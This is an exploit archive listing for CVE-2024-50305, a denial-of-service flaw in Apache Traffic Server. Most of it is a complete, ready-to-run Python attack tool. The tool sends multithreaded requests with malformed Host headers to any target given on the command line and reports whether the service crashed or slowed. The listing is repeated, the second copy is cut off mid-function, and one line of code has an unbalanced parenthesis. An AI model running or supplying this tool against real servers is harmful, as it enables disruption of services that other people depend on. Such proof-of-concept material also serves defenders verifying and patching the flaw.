7.5
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description
Proof of concept remote denial of service exploit for Apache Traffic Server versions 9.2.0 through 9.2.5 that leverages the host header...
Basic Information
ID
PACKETSTORM:215923
Published
Feb 20, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Apache Traffic Server Host Header Denial of Service Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://trafficserver.apache.org/ |
=============================================================================================================================================
[+] Summary : A denial-of-service (DoS) vulnerability identified as CVE-2024-50305 affects Apache Traffic Server due to improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests.
An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions,
this may lead to service instability, excessive resource consumption, unexpected connection termination, or potential process crashes, resulting in temporary denial of service.
The issue highlights insufficient input validation within HTTP request parsing logic. Proper boundary checks, strict header validation, and adherence to RFC standards are recommended to mitigate the risk
[+] POC :
#!/usr/bin/env python3
import socket
import sys
import time
import argparse
import threading
import ssl
import ipaddress
import random
import string
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Tuple, Optional, Dict, Any
from enum import Enum
from dataclasses import dataclass, field
from contextlib import contextmanager
import logging
from collections import Counter
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%H:%M:%S'
)
logger = logging.getLogger('cve_2024_50305')
class ServiceState(Enum):
"""Possible service states"""
UP = "up"
DOWN = "down"
UNKNOWN = "unknown"
FILTERED = "filtered"
SLOW = "slow"
ERROR = "error"
class Protocol(Enum):
"""Connection protocol"""
HTTP1 = "http/1.1"
HTTP2 = "http/2"
UNKNOWN = "unknown"
class CrashConfidence(Enum):
"""Confidence level in crash detection"""
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
NONE = "none"
@dataclass
class RequestResult:
"""Result of a single request"""
payload: str
response_time: float
status_code: Optional[int] = None
crash_confidence: CrashConfidence = CrashConfidence.NONE
error: Optional[str] = None
timeout_occurred: bool = False
bytes_received: int = 0
connection_reset: bool = False
@dataclass
class Statistics:
"""Attack statistics - optimized to avoid memory growth"""
total_requests: int = 0
crashes_high: int = 0
crashes_medium: int = 0
crashes_low: int = 0
timeouts: int = 0
connection_refused: int = 0
connection_reset: int = 0
successful: int = 0
errors: int = 0
status_codes: Counter = field(default_factory=Counter)
# Response time stats - stored compactly
response_time_sum: float = 0.0
response_time_count: int = 0
response_time_min: float = float('inf')
response_time_max: float = 0.0
class HTTPResponseParser:
"""HTTP response parser"""
@staticmethod
def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
"""
Parses the first status line of an HTTP response
"""
if not data:
return None, None
end_of_line = data.find(b'\r\n')
if end_of_line == -1:
return None, None
first_line = data[:end_of_line].decode('ascii', errors='ignore')
parts = first_line.split(' ')
if len(parts) < 2:
return None, None
protocol = Protocol.UNKNOWN
if parts[0].startswith('HTTP/1'):
protocol = Protocol.HTTP1
elif parts[0].startswith('HTTP/2'):
protocol = Protocol.HTTP2
try:
status_code = int(parts[1])
return status_code, protocol
except (ValueError, IndexError):
return None, protocol
class TargetResolver:
"""Resolves target addresses with IPv4/IPv6 support"""
def __init__(self, prefer_ipv6: bool = False):
self.prefer_ipv6 = prefer_ipv6
self._cache = {}
def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
"""
Checks if the text is an IP address and returns its family
Returns: (is_ip, family)
"""
try:
ip_obj = ipaddress.ip_address(target)
if ip_obj.version == 6:
return True, socket.AF_INET6
else:
return True, socket.AF_INET
except ValueError:
return False, None
def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
"""
Resolves target to (ip, port, family)
Returns:
(ip, port, socket_family) or None on failure
"""
cache_key = f"{target}:{port}:{self.prefer_ipv6}"
if cache_key in self._cache:
return self._cache[cache_key]
is_ip, ip_family = self._is_ip_address(target)
if is_ip:
result = (target, port, ip_family)
self._cache[cache_key] = result
return result
if self.prefer_ipv6:
families = [socket.AF_INET6, socket.AF_INET]
else:
families = [socket.AF_INET, socket.AF_INET6]
for family in families:
try:
addrinfo = socket.getaddrinfo(
target,
port,
family=family,
type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP
)
if addrinfo:
_, _, _, _, sockaddr = addrinfo[0]
if family == socket.AF_INET6:
ip, port, flowinfo, scopeid = sockaddr
else:
ip, port = sockaddr
result = (ip, port, family)
self._cache[cache_key] = result
logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})")
return result
except socket.gaierror:
continue
except Exception as e:
logger.debug(f"Error resolving {target} using family {family}: {e}")
continue
logger.error(f"Failed to resolve {target}")
return None
class ServiceChecker:
"""Accurate service status checker"""
def __init__(self, timeout: float = 5, max_header_size: int = 8192):
self.timeout = timeout
self.max_header_size = max_header_size
@contextmanager
def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None):
"""Creates a socket with SSL support"""
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
try:
if use_ssl:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
is_ip = False
if hostname:
try:
ipaddress.ip_address(hostname)
is_ip = True
except ValueError:
pass
server_hostname = hostname if hostname and not is_ip else None
sock = context.wrap_socket(sock, server_hostname=server_hostname)
yield sock
finally:
try:
sock.close()
except:
pass
def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
"""Checks validity of HTTP response and extracts status code"""
status_code, _ = HTTPResponseParser.parse_status_line(data)
return status_code is not None, status_code
def check(self, ip: str, port: int, family: int,
hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
"""
Performs a detailed service check
Returns:
(State, Response Time, Status Code)
"""
start_time = time.monotonic()
try:
with self._create_socket(family, use_ssl, hostname or ip) as sock:
host_header = hostname or ip
if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
host_header = f"[{ip}]"
request = (
f"GET / HTTP/1.1\r\n"
f"Host: {host_header}\r\n"
f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
f"Accept: text/html,application/xhtml+xml\r\n"
f"Accept-Language: en-US,en;q=0.9\r\n"
f"Connection: close\r\n"
f"\r\n"
).encode()
if family == socket.AF_INET6:
sock.connect((ip, port, 0, 0))
else:
sock.connect((ip, port))
sock.sendall(request)
response = b""
while True:
try:
chunk = sock.recv(self.max_header_size)
if not chunk:
break
response += chunk
if b'\r\n\r\n' in response:
break
if len(response) > self.max_header_size:
break
except socket.timeout:
break
response_time = time.monotonic() - start_time
is_valid, status_code = self._is_valid_http_response(response)
if is_valid and status_code is not None:
if 200 <= status_code < 600:
return ServiceState.UP, response_time, status_code
else:
return ServiceState.UP, response_time, status_code
elif response:
return ServiceState.UNKNOWN, response_time, None
else:
return ServiceState.UNKNOWN, response_time, None
except socket.timeout:
return ServiceState.SLOW, self.timeout, None
except ConnectionRefusedError:
return ServiceState.DOWN, 0, None
except ConnectionResetError:
return ServiceState.UNKNOWN, time.monotonic() - start_time, None
except socket.gaierror:
return ServiceState.ERROR, 0, None
except Exception as e:
logger.debug(f"Check Error: {e}")
return ServiceState.ERROR, 0, None
class RequestSender:
"""Sends malicious requests with detailed result analysis"""
def __init__(self, timeout: float = 5, max_response_size: int = 4096):
self.timeout = timeout
self.max_response_size = max_response_size
@contextmanager
def _create_socket(self, family: int):
"""Creates a socket"""
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
try:
yield sock
finally:
try:
sock.close()
except:
pass
def _evaluate_crash_confidence(self, result: RequestResult,
normal_behavior: Dict) -> CrashConfidence:
"""
Evaluates crash detection confidence based on several factors
"""
if result.connection_reset:
return CrashConfidence.HIGH
if result.timeout_occurred and result.bytes_received == 0:
return CrashConfidence.MEDIUM
if result.bytes_received == 0 and not result.error:
return CrashConfidence.LOW
return CrashConfidence.NONE
def send(self, ip: str, port: int, family: int,
host_payload: str, baseline_time: float = 1.0) -> RequestResult:
"""
Sends a malicious request with accurate result analysis
Args:
baseline_time: Normal service response time
"""
result = RequestResult(payload=host_payload, response_time=0.0)
start_time = time.monotonic()
try:
with self._create_socket(family) as sock:
try:
if family == socket.AF_INET6:
sock.connect((ip, port, 0, 0))
else:
sock.connect((ip, port))
except ConnectionRefusedError:
result.error = "connection_refused"
result.response_time = time.monotonic() - start_time
return result
try:
encoded_host = host_payload.encode('utf-8')
except UnicodeEncodeError:
encoded_host = host_payload.encode('ascii', errors='replace')
request = (
b"GET / HTTP/1.1\r\n"
b"Host: " + encoded_host + b"\r\n"
b"User-Agent: CVE-2024-50305/1.0\r\n"
b"Accept: */*\r\n"
b"Connection: close\r\n"
b"\r\n"
)
try:
sock.sendall(request)
except ConnectionResetError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
return result
except BrokenPipeError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
response = b""
try:
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
if len(response) > self.max_response_size:
break
except socket.timeout:
result.timeout_occurred = True
break
except ConnectionResetError:
result.connection_reset = True
result.crash_confidence = CrashConfidence.HIGH
result.response_time = time.monotonic() - start_time
result.bytes_received = len(response)
if response:
status_code, _ = HTTPResponseParser.parse_status_line(response)
result.status_code = status_code
if status_code is not None:
result.crash_confidence = CrashConfidence.NONE
else:
result.crash_confidence = CrashConfidence.LOW
if result.crash_confidence == CrashConfidence.NONE:
result.crash_confidence = self._evaluate_crash_confidence(result, {})
except Exception as e:
result.error = str(e)
result.response_time = time.monotonic() - start_time
return result
class PayloadGenerator:
"""Generates malicious Host values"""
BASE_PAYLOADS = [
":", "::", "[::1]", "", "\0",
"localhost:8080:extra", "host\x00injection",
]
SPECIAL_CHARS = list(string.punctuation + string.whitespace)
@classmethod
def generate(cls, count: int = 30) -> List[str]:
"""Generates a list of payloads"""
count = max(10, min(count, 100))
payloads = set(cls.BASE_PAYLOADS)
for length in [100, 500, 1000, 2000, 5000]:
if len(payloads) < count:
payloads.add('A' * length)
payloads.add('B' * length)
random_needed = count - len(payloads)
if random_needed > 0:
for _ in range(random_needed):
length = random.randint(5, 50)
random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length))
payloads.add(random_payload)
unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
payloads.update(unicode_samples[:max(0, count - len(payloads))])
return list(payloads)[:count]
class StatisticsCollector:
"""Thread-safe statistics collection with memory control"""
def __init__(self, max_response_times: int = 1000):
self.lock = threading.Lock()
self.stats = Statistics()
self.max_response_times = max_response_times
self._response_times_sample = [] # Limited sample for analysis
def add_result(self, result: RequestResult):
"""Adds a result in a thread-safe manner"""
with self.lock:
self.stats.total_requests += 1
if result.crash_confidence == CrashConfidence.HIGH:
self.stats.crashes_high += 1
elif result.crash_confidence == CrashConfidence.MEDIUM:
self.stats.crashes_medium += 1
elif result.crash_confidence == CrashConfidence.LOW:
self.stats.crashes_low += 1
if result.error == "connection_refused":
self.stats.connection_refused += 1
elif result.connection_reset:
self.stats.connection_reset += 1
elif result.error:
self.stats.errors += 1
if result.timeout_occurred:
self.stats.timeouts += 1
if result.status_code is not None:
self.stats.successful += 1
self.stats.status_codes[result.status_code] += 1
if result.response_time > 0:
self.stats.response_time_sum += result.response_time
self.stats.response_time_count += 1
self.stats.response_time_min = min(self.stats.response_time_min, result.response_time)
self.stats.response_time_max = max(self.stats.response_time_max, result.response_time)
if len(self._response_times_sample) < self.max_response_times:
self._response_times_sample.append(result.response_time)
def get_stats(self) -> Statistics:
"""Gets a copy of the statistics"""
with self.lock:
stats_copy = Statistics(
total_requests=self.stats.total_requests,
crashes_high=self.stats.crashes_high,
crashes_medium=self.stats.crashes_medium,
crashes_low=self.stats.crashes_low,
timeouts=self.stats.timeouts,
connection_refused=self.stats.connection_refused,
connection_reset=self.stats.connection_reset,
successful=self.stats.successful,
errors=self.stats.errors,
status_codes=self.stats.status_codes.copy(),
response_time_sum=self.stats.response_time_sum,
response_time_count=self.stats.response_time_count,
response_time_min=self.stats.response_time_min,
response_time_max=self.stats.response_time_max
)
return stats_copy
def get_average_response_time(self) -> float:
"""Calculates average response time"""
if self.stats.response_time_count > 0:
return self.stats.response_time_sum / self.stats.response_time_count
return 0.0
class CVE202450305Exploit:
"""Main exploit class"""
def __init__(self, target: str, port: int = 80, threads: int = 5,
timeout: float = 5, prefer_ipv6: bool = False,
use_ssl: bool = False, rate_limit: float = 0.1):
if not 1 <= port <= 65535:
raise ValueError(f"Invalid port number: {port}")
if threads < 1 or threads > 100:
raise ValueError(f"Thread count must be between 1 and 100")
self.target = target
self.port = port
self.threads = threads
self.timeout = timeout
self.prefer_ipv6 = prefer_ipv6
self.use_ssl = use_ssl
self.rate_limit = rate_limit
self.resolver = TargetResolver(prefer_ipv6)
self.checker = ServiceChecker(timeout)
self.sender = RequestSender(timeout)
self.stats = StatisticsCollector()
self.target_ip = None
self.target_family = None
self.baseline_state = ServiceState.UNKNOWN
self.baseline_time = 1.0 # Default value
self.baseline_status = None
self.is_ip_target = False
def initialize(self) -> bool:
"""Initializes exploit and resolves target"""
logger.info(f"Initializing exploit for target {self.target}:{self.port}")
resolved = self.resolver.resolve(self.target, self.port)
if not resolved:
logger.error("Failed to resolve target")
return False
self.target_ip, _, self.target_family = resolved
try:
ipaddress.ip_address(self.target)
self.is_ip_target = True
except ValueError:
self.is_ip_target = False
logger.info(f"Target resolved: {self.target_ip} "
f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
logger.info("Performing baseline service check...")
state, resp_time, status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
self.baseline_state = state
if resp_time > 0:
self.baseline_time = resp_time
self.baseline_status = status
if state == ServiceState.UP:
logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.SLOW:
logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.UNKNOWN:
logger.warning(f" Service status is UNKNOWN")
return True
else:
logger.error(f" Service is NOT running: {state.value}")
return False
def _process_payload_chunk(self, payloads: List[str], iteration: int,
chunk_idx: int) -> List[RequestResult]:
"""Processes a subset of payloads"""
results = []
with ThreadPoolExecutor(max_workers=self.threads) as executor:
future_to_payload = {}
for payload in payloads:
if self.rate_limit > 0:
time.sleep(self.rate_limit)
future = executor.submit(
self.sender.send,
self.target_ip,
self.port,
self.target_family,
payload,
self.baseline_time
)
future_to_payload[future] = payload
for future in as_completed(future_to_payload):
try:
result = future.result(timeout=self.timeout + 2)
results.append(result)
self.stats.add_result(result)
if result.crash_confidence == CrashConfidence.HIGH:
logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...")
elif result.crash_confidence == CrashConfidence.MEDIUM:
logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...")
elif result.connection_reset:
logger.debug(f" Connection reset: {repr(result.payload)[:50]}...")
elif result.timeout_occurred:
logger.debug(f" Timeout: {repr(result.payload)[:50]}...")
except Exception as e:
logger.error(f"Error processing result: {e}")
return results
def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
"""
Executes the attack
Returns:
(Exploit_Success, Statistics)
"""
logger.info("=" * 60)
logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
logger.info("=" * 60)
logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
logger.info(f"Rate limit: {self.rate_limit}s")
logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
logger.info("=" * 60)
payloads = PayloadGenerator.generate(payload_count)
logger.info(f" Generated {len(payloads)} malicious Host values")
all_results = []
for iteration in range(iterations):
logger.info(f"\n Iteration {iteration + 1}/{iterations}")
chunk_size = max(1, len(payloads)
chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
for chunk_idx, chunk in enumerate(chunks):
logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}")
results = self._process_payload_chunk(chunk, iteration, chunk_idx)
all_results.extend(results)
stats = self.stats.get_stats()
logger.info(f" Progress: {stats.total_requests}/{iterations * len(payloads)} "
f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
if chunk_idx < len(chunks) - 1:
time.sleep(1)
final_stats = self.stats.get_stats()
avg_time = self.stats.get_average_response_time()
logger.info("\n" + "=" * 60)
logger.info(" Final Statistics:")
logger.info(f" Total Requests: {final_stats.total_requests}")
logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
logger.info(f" Timeouts: {final_stats.timeouts}")
logger.info(f" Connection resets: {final_stats.connection_reset}")
logger.info(f" Connection refused: {final_stats.connection_refused}")
logger.info(f" Successful responses: {final_stats.successful}")
if final_stats.status_codes:
logger.info(f" Status Codes: {dict(final_stats.status_codes)}")
if final_stats.response_time_count > 0:
logger.info(f" Response Time - Avg: {avg_time:.3f}s")
logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s")
logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s")
logger.info("=" * 60)
logger.info("\n Verifying exploit success...")
time.sleep(3)
post_state, post_time, post_status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
success = False
reasons = []
if final_stats.crashes_high > 0:
reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
success = True
if final_stats.crashes_medium > 3:
reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
success = True
if self.baseline_state == ServiceState.UP:
if post_state == ServiceState.DOWN:
reasons.append("Service stopped after attack")
success = True
elif post_state == ServiceState.SLOW and self.baseline_time > 0:
slowdown_ratio = post_time / self.baseline_time
if slowdown_ratio > 3:
reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
success = True
if success:
logger.info("Exploit Successful!")
for reason in reasons:
logger.info(f" • {reason}")
return True, final_stats
else:
logger.info(" Exploit Failed")
if reasons:
logger.info(f" ({', '.join(reasons)})")
else:
logger.info(" No evidence of vulnerability found")
return False, final_stats
def main():
"""Main function"""
parser = argparse.ArgumentParser(
description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("target", help="Target address (IP or domain)")
parser.add_argument("-p", "--port", type=int, default=80,
help="Target port (1-65535, default: 80)")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Thread count (1-100, default: 5)")
parser.add_argument("--timeout", type=float, default=5,
help="Connection timeout in seconds (default: 5)")
parser.add_argument("--ipv6", action="store_true",
help="Prefer IPv6")
parser.add_argument("--ssl", action="store_true",
help="Use HTTPS/SSL")
parser.add_argument("--rate-limit", type=float, default=0.05,
help="Delay between requests in seconds (default: 0.05)")
parser.add_argument("-c", "--payloads", type=int, default=30,
help="Number of payloads to test (10-100, default: 30)")
parser.add_argument("-i", "--iterations", type=int, default=3,
help="Number of iterations (default: 3)")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show detailed information")
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
try:
exploit = CVE202450305Exploit(
target=args.target,
port=args.port,
threads=args.threads,
timeout=args.timeout,
prefer_ipv6=args.ipv6,
use_ssl=args.ssl,
rate_limit=args.rate_limit
)
if not exploit.initialize():
sys.exit(2)
success, stats = exploit.run(
payload_count=args.payloads,
iterations=args.iterations
)
sys.exit(0 if success else 1)
except KeyboardInterrupt:
logger.info("\nAttack stopped by user")
sys.exit(2)
except ValueError as e:
logger.error(f"Input Error: {e}")
sys.exit(2)
except Exception as e:
logger.error(f"Unexpected Error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(2)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : Apache Traffic Server Host Header Denial of Service Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://trafficserver.apache.org/ |
=============================================================================================================================================
[+] Summary : A denial-of-service (DoS) vulnerability identified as CVE-2024-50305 affects Apache Traffic Server due to improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests.
An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions,
this may lead to service instability, excessive resource consumption, unexpected connection termination, or potential process crashes, resulting in temporary denial of service.
The issue highlights insufficient input validation within HTTP request parsing logic. Proper boundary checks, strict header validation, and adherence to RFC standards are recommended to mitigate the risk
[+] POC :
#!/usr/bin/env python3
import socket
import sys
import time
import argparse
import threading
import ssl
import ipaddress
import random
import string
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Tuple, Optional, Dict, Any
from enum import Enum
from dataclasses import dataclass, field
from contextlib import contextmanager
import logging
from collections import Counter
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%H:%M:%S'
)
logger = logging.getLogger('cve_2024_50305')
class ServiceState(Enum):
"""Possible service states"""
UP = "up"
DOWN = "down"
UNKNOWN = "unknown"
FILTERED = "filtered"
SLOW = "slow"
ERROR = "error"
class Protocol(Enum):
"""Connection protocol"""
HTTP1 = "http/1.1"
HTTP2 = "http/2"
UNKNOWN = "unknown"
class CrashConfidence(Enum):
"""Confidence level in crash detection"""
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
NONE = "none"
@dataclass
class RequestResult:
"""Result of a single request"""
payload: str
response_time: float
status_code: Optional[int] = None
crash_confidence: CrashConfidence = CrashConfidence.NONE
error: Optional[str] = None
timeout_occurred: bool = False
bytes_received: int = 0
connection_reset: bool = False
@dataclass
class Statistics:
"""Attack statistics - optimized to avoid memory growth"""
total_requests: int = 0
crashes_high: int = 0
crashes_medium: int = 0
crashes_low: int = 0
timeouts: int = 0
connection_refused: int = 0
connection_reset: int = 0
successful: int = 0
errors: int = 0
status_codes: Counter = field(default_factory=Counter)
# Response time stats - stored compactly
response_time_sum: float = 0.0
response_time_count: int = 0
response_time_min: float = float('inf')
response_time_max: float = 0.0
class HTTPResponseParser:
"""HTTP response parser"""
@staticmethod
def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
"""
Parses the first status line of an HTTP response
"""
if not data:
return None, None
end_of_line = data.find(b'\r\n')
if end_of_line == -1:
return None, None
first_line = data[:end_of_line].decode('ascii', errors='ignore')
parts = first_line.split(' ')
if len(parts) < 2:
return None, None
protocol = Protocol.UNKNOWN
if parts[0].startswith('HTTP/1'):
protocol = Protocol.HTTP1
elif parts[0].startswith('HTTP/2'):
protocol = Protocol.HTTP2
try:
status_code = int(parts[1])
return status_code, protocol
except (ValueError, IndexError):
return None, protocol
class TargetResolver:
"""Resolves target addresses with IPv4/IPv6 support"""
def __init__(self, prefer_ipv6: bool = False):
self.prefer_ipv6 = prefer_ipv6
self._cache = {}
def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
"""
Checks if the text is an IP address and returns its family
Returns: (is_ip, family)
"""
try:
ip_obj = ipaddress.ip_address(target)
if ip_obj.version == 6:
return True, socket.AF_INET6
else:
return True, socket.AF_INET
except ValueError:
return False, None
def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
"""
Resolves target to (ip, port, family)
Returns:
(ip, port, socket_family) or None on failure
"""
cache_key = f"{target}:{port}:{self.prefer_ipv6}"
if cache_key in self._cache:
return self._cache[cache_key]
is_ip, ip_family = self._is_ip_address(target)
if is_ip:
result = (target, port, ip_family)
self._cache[cache_key] = result
return result
if self.prefer_ipv6:
families = [socket.AF_INET6, socket.AF_INET]
else:
families = [socket.AF_INET, socket.AF_INET6]
for family in families:
try:
addrinfo = socket.getaddrinfo(
target,
port,
family=family,
type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP
)
if addrinfo:
_, _, _, _, sockaddr = addrinfo[0]
if family == socket.AF_INET6:
ip, port, flowinfo, scopeid = sockaddr
else:
ip, port = sockaddr
result = (ip, port, family)
self._cache[cache_key] = result
logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})")
return result
except socket.gaierror:
continue
except Exception as e:
logger.debug(f"Error resolving {target} using family {family}: {e}")
continue
logger.error(f"Failed to resolve {target}")
return None
class ServiceChecker:
"""Accurate service status checker"""
def __init__(self, timeout: float = 5, max_header_size: int = 8192):
self.timeout = timeout
self.max_header_size = max_header_size
@contextmanager
def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None):
"""Creates a socket with SSL support"""
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
try:
if use_ssl:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
is_ip = False
if hostname:
try:
ipaddress.ip_address(hostname)
is_ip = True
except ValueError:
pass
server_hostname = hostname if hostname and not is_ip else None
sock = context.wrap_socket(sock, server_hostname=server_hostname)
yield sock
finally:
try:
sock.close()
except:
pass
def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
"""Checks validity of HTTP response and extracts status code"""
status_code, _ = HTTPResponseParser.parse_status_line(data)
return status_code is not None, status_code
def check(self, ip: str, port: int, family: int,
hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
"""
Performs a detailed service check
Returns:
(State, Response Time, Status Code)
"""
start_time = time.monotonic()
try:
with self._create_socket(family, use_ssl, hostname or ip) as sock:
host_header = hostname or ip
if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
host_header = f"[{ip}]"
request = (
f"GET / HTTP/1.1\r\n"
f"Host: {host_header}\r\n"
f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
f"Accept: text/html,application/xhtml+xml\r\n"
f"Accept-Language: en-US,en;q=0.9\r\n"
f"Connection: close\r\n"
f"\r\n"
).encode()
if family == socket.AF_INET6:
sock.connect((ip, port, 0, 0))
else:
sock.connect((ip, port))
sock.sendall(request)
response = b""
while True:
try:
chunk = sock.recv(self.max_header_size)
if not chunk:
break
response += chunk
if b'\r\n\r\n' in response:
break
if len(response) > self.max_header_size:
break
except socket.timeout:
break
response_time = time.monotonic() - start_time
is_valid, status_code = self._is_valid_http_response(response)
if is_valid and status_code is not None:
if 200 <= status_code < 600:
return ServiceState.UP, response_time, status_code
else:
return ServiceState.UP, response_time, status_code
elif response:
return ServiceState.UNKNOWN, response_time, None
else:
return ServiceState.UNKNOWN, response_time, None
except socket.timeout:
return ServiceState.SLOW, self.timeout, None
except ConnectionRefusedError:
return ServiceState.DOWN, 0, None
except ConnectionResetError:
return ServiceState.UNKNOWN, time.monotonic() - start_time, None
except socket.gaierror:
return ServiceState.ERROR, 0, None
except Exception as e:
logger.debug(f"Check Error: {e}")
return ServiceState.ERROR, 0, None
class RequestSender:
"""Sends malicious requests with detailed result analysis"""
def __init__(self, timeout: float = 5, max_response_size: int = 4096):
self.timeout = timeout
self.max_response_size = max_response_size
@contextmanager
def _create_socket(self, family: int):
"""Creates a socket"""
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
try:
yield sock
finally:
try:
sock.close()
except:
pass
def _evaluate_crash_confidence(self, result: RequestResult,
normal_behavior: Dict) -> CrashConfidence:
"""
Evaluates crash detection confidence based on several factors
"""
if result.connection_reset:
return CrashConfidence.HIGH
if result.timeout_occurred and result.bytes_received == 0:
return CrashConfidence.MEDIUM
if result.bytes_received == 0 and not result.error:
return CrashConfidence.LOW
return CrashConfidence.NONE
def send(self, ip: str, port: int, family: int,
host_payload: str, baseline_time: float = 1.0) -> RequestResult:
"""
Sends a malicious request with accurate result analysis
Args:
baseline_time: Normal service response time
"""
result = RequestResult(payload=host_payload, response_time=0.0)
start_time = time.monotonic()
try:
with self._create_socket(family) as sock:
try:
if family == socket.AF_INET6:
sock.connect((ip, port, 0, 0))
else:
sock.connect((ip, port))
except ConnectionRefusedError:
result.error = "connection_refused"
result.response_time = time.monotonic() - start_time
return result
try:
encoded_host = host_payload.encode('utf-8')
except UnicodeEncodeError:
encoded_host = host_payload.encode('ascii', errors='replace')
request = (
b"GET / HTTP/1.1\r\n"
b"Host: " + encoded_host + b"\r\n"
b"User-Agent: CVE-2024-50305/1.0\r\n"
b"Accept: */*\r\n"
b"Connection: close\r\n"
b"\r\n"
)
try:
sock.sendall(request)
except ConnectionResetError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
return result
except BrokenPipeError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
response = b""
try:
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
if len(response) > self.max_response_size:
break
except socket.timeout:
result.timeout_occurred = True
break
except ConnectionResetError:
result.connection_reset = True
result.crash_confidence = CrashConfidence.HIGH
result.response_time = time.monotonic() - start_time
result.bytes_received = len(response)
if response:
status_code, _ = HTTPResponseParser.parse_status_line(response)
result.status_code = status_code
if status_code is not None:
result.crash_confidence = CrashConfidence.NONE
else:
result.crash_confidence = CrashConfidence.LOW
if result.crash_confidence == CrashConfidence.NONE:
